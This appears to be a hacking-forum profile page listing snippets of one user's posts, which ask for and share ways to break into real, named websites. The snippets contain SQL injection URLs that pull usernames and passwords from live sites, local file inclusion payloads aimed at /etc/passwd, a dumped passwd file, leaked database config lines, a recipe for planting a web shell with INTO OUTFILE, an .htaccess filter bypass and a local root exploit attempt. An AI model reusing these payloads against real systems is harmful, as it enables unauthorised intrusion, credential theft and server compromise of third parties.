Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Where you should disclose your vulnerabilities. Go read RFPolicy if you want to do responsible disclosure, and go here for when all else fails. 

Pages: 12Next
Current Page: 1 of 2
Results 1 - 30 of 41
3 years ago
TopSaT13
thanggiangho Wrote: ------------------------------------------------------- > ok- 403 forbbiden when i add ' >>>no injection ( > not sure) > > :D 99% no vuln
Forum: SQL and Code Injection
3 years ago
TopSaT13
source code of page <?php session_start();?> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> <?php //$link = mysql_connect("127.0.0.1","x","x") or die("Impossible de se connecter"); //mysql_select_db("khaldoun") or die("Could not select database"); if (!isset($_G
Forum: SQL and Code Injection
3 years ago
TopSaT13
thanks brothers but ... %00 and %0a ca't do anything so i can't remove extenction .php ?id=php://filter/read=convert.base64-encode/resource=/etc/passwd%0A => Warning: include(php://filter/read=convert.base64-encode/resource=/etc/passwd .php) : failed to open stream: No such file or directory in /var/www/site/index.php on line 70 and ?id=php://filter/read=convert.base64-encode/resource
Forum: SQL and Code Injection
3 years ago
TopSaT13
Reiners Wrote: ------------------------------------------------------- > as you see in the warning there is no filter and > the file name is passed successfully to the > include function. something else must be wrong. > are you sure the file exists? yes exist :) why i can't read /etc/passwd ?.. ?id=/etc/passwd result==> Warning: include(/etc/passwd.php) : failed to o
Forum: SQL and Code Injection
3 years ago
TopSaT13
Hey freands! i found an lfi vuln.. but i cant read /etc/passwd or any file not in vuln directory look : ?id=php://filter/read=convert.base64-encode/resource=index.php ===>> Warning: include(php://filter/read=convert.base64-encode/resource=index.php.php) : failed to open stream: No such file or directory in /var/www/site/index.php on line 70 ---------- and i del .php----- ?id=php:
Forum: SQL and Code Injection
3 years ago
TopSaT13
Powered by iWebKit :D
Forum: SQL and Code Injection
3 years ago
TopSaT13
VMw4r3 Wrote: ------------------------------------------------------- > Why do you want to bypass the filter when theres > no injection? yes...just like idea ! :D
Forum: SQL and Code Injection
3 years ago
TopSaT13
VMw4r3 Wrote: ------------------------------------------------------- > It looks like (') is filtered. ** yes bro i know but i need any method to bypass this filter ?
Forum: SQL and Code Injection
3 years ago
TopSaT13
Hi brothers all fine ^^ i found this web site vuln sqli delphi.dev-dz.com/autresites_detail.php?id=47 but when i add (') in value id=47' get Forbidden and order by 1 no error order by 10000000000000000-- no error but when i add (') like: autresites_detail.php?id=47' orde by 1--+ i get Forbidden pleaz my brothers ..any bypass this forbidden ! Thanx alot ! : )
Forum: SQL and Code Injection
3 years ago
TopSaT13
hi brothers...how ar u fine :D i found an vuln site rnd-dz.com/view_histo_fond_ar.php?news_id=-6%27+union+select+group_concat%28user_id,0x3e,username,0x3a,password,0x3e,email%29,2,3,4,5+from+sys_user--+ so when i use load file to read passwd file (or any file) ....not have any error and not get any file ?? like : rnd-dz.com/view_histo_fond_ar.php?news_id=-6%27+union+select+load_file%28%
Forum: SQL and Code Injection
3 years ago
TopSaT13
hi member's i hav shell on secure server many function was desabled by SEcurity but i can't bypass it info: PHP Version 5.2.15 desable fontions : Code: symlink,shell_exec,exec,proc_close,proc_open,popen,system,dl,passthru,escapeshel ​ larg,escapeshellcmd,posix_getgid,virtual,posix_getgrgid,dl,set_time_limit,exec,p ​ close,proc_nice,proc_terminate,proc_get_status,pfsockopen,leak,apache_c
Forum: Full Disclosure
3 years ago
TopSaT13
Plitvix : tnx my brother tnx all i found solution : etc/passwd root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/bin:/bin/sh bin:x:2:2:bin:/bin:/bin/sh sys:x:3:3:sys:/dev:/bin/sh sync:x:4:65534:sync:/bin:/bin/sync man:x:6:12:man:/var/cache/man:/bin/sh mail:x:8:8:mail:/var/mail:/bin/sh uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh proxy:x:13:13:proxy:/bin:/bin/sh www-data:x:33:33:www-data:/
Forum: SQL and Code Injection
3 years ago
TopSaT13
hi brothers ..fine? i found an sqli in universite.univ-tlemcen.dz .. when i put (') in search bar i found sql error Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /home/Annuaire/public_html/resultat_recherche.php on line 55 Erreur dans la requete: SELECT * FROM `enseignant` WHERE UPPER(nom) LIKE ''%' Avec erreur: You have an error in your SQL syntax; ch
Forum: SQL and Code Injection
3 years ago
TopSaT13
antivirus @ thank u bro :):) -------------------- waiting any helps for this injection http://www.abigailandeye.co.uk/client-gallery/index.php?pageId=104&start=0 Only For education
Forum: SQL and Code Injection
3 years ago
TopSaT13
Hy all, i fond this problm http://www.abigailandeye.co.uk/client-gallery/index.php?pageId=104&start=0 when i add (') = Frobidden :( order by 1 no error :) but order by 1000000000000000000000000 no error i add --+ at end i fond frobiden 0' order by 1 --+ = forbiden :-( any helps ?? pleaz :) ----- http://www.ubiquisys.com/ub3b/pressreleases.php?id=115 frobiden :(
Forum: SQL and Code Injection
4 years ago
TopSaT13
hy all evry one find this problm when he want to get root resutl is mmap:permission dinied because "Mmap_min_addr" not 0 evry one have how to bypass "Mmap_min_addr" and write on 0 "Zero" semple exemple: ------------------------------------------------------------- cat /proc/sys/vm/mmap_min_addr 0 gcc -o gayros local-root-exploit-gayros.c ./gayros we
Forum: Full Disclosure
4 years ago
TopSaT13
:O, i dont think those are hashes
Forum: SQL and Code Injection
4 years ago
TopSaT13
No comment..:@
Forum: SQL and Code Injection
4 years ago
TopSaT13
so hyrax i don't anderstard your problm give me url and i see good lookk
Forum: SQL and Code Injection
4 years ago
TopSaT13
hyrax @ lok brother im not children, ok i can't anderstad your problm by txt file, + im Ethical Hacker . so respect me . 2.i post url because by url i can test and tell you where is problm ok :@ so be respct
Forum: SQL and Code Injection
4 years ago
TopSaT13
lik bro :) to intect shell you must floder chmod 777 lik uploads/ , img/ if you not find floder chmod 777 you can't intect shell exemple: upload is chmod 777 hxxt://google.com/web.php?id=-1 union select 1,2,'test',4,5 into outfile '/home/google/pub/upload/tst.php'-- google . com /upload/tst.php ..found :)
Forum: SQL and Code Injection
4 years ago
TopSaT13
mybe run
Forum: Full Disclosure
4 years ago
TopSaT13
@VMw4re i find it :D <?php //Header("Cache-control: private, no-cache"); //Header("Expires: Mon, 26 Jun 1997 05:00:00 GMT"); //Header("Pragma: no-cache"); //Header ("Last-Modified: " . gmdate ("D, d M Y H:i:s") . " GMT"); // This is an example of config.php $dbhost = 'localhost'; $dbuser = 'singart_singuser'; $dbpass =
Forum: SQL and Code Injection
4 years ago
TopSaT13
thnk you my freand but , you use load file to read it?
Forum: SQL and Code Injection
4 years ago
TopSaT13
arabs found its since 200x
Forum: Bugs
4 years ago
TopSaT13
Hy all @hc0de .you can explique to me how to read config.php by this http://www.singaporeartmuseum.sg/exhibitions/details.php?id=-48+UNION+/*!SELECT*/+1,2,3,4,5,6,7,8,9,10,11,12,13,0x2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f6574632f706173737764
Forum: SQL and Code Injection
4 years ago
TopSaT13
@flics: Thank you my freand :) this: Options Indexes FollowSymLinks DirectoryIndex ssssss.htm AddType txt .php AddHandler txt .php ---------------- to bypass frobidden :) i use it on many server its run normaly :p i think , the root desable some commands htaccess
Forum: SQL and Code Injection
Pages: 12Next
Current Page: 1 of 2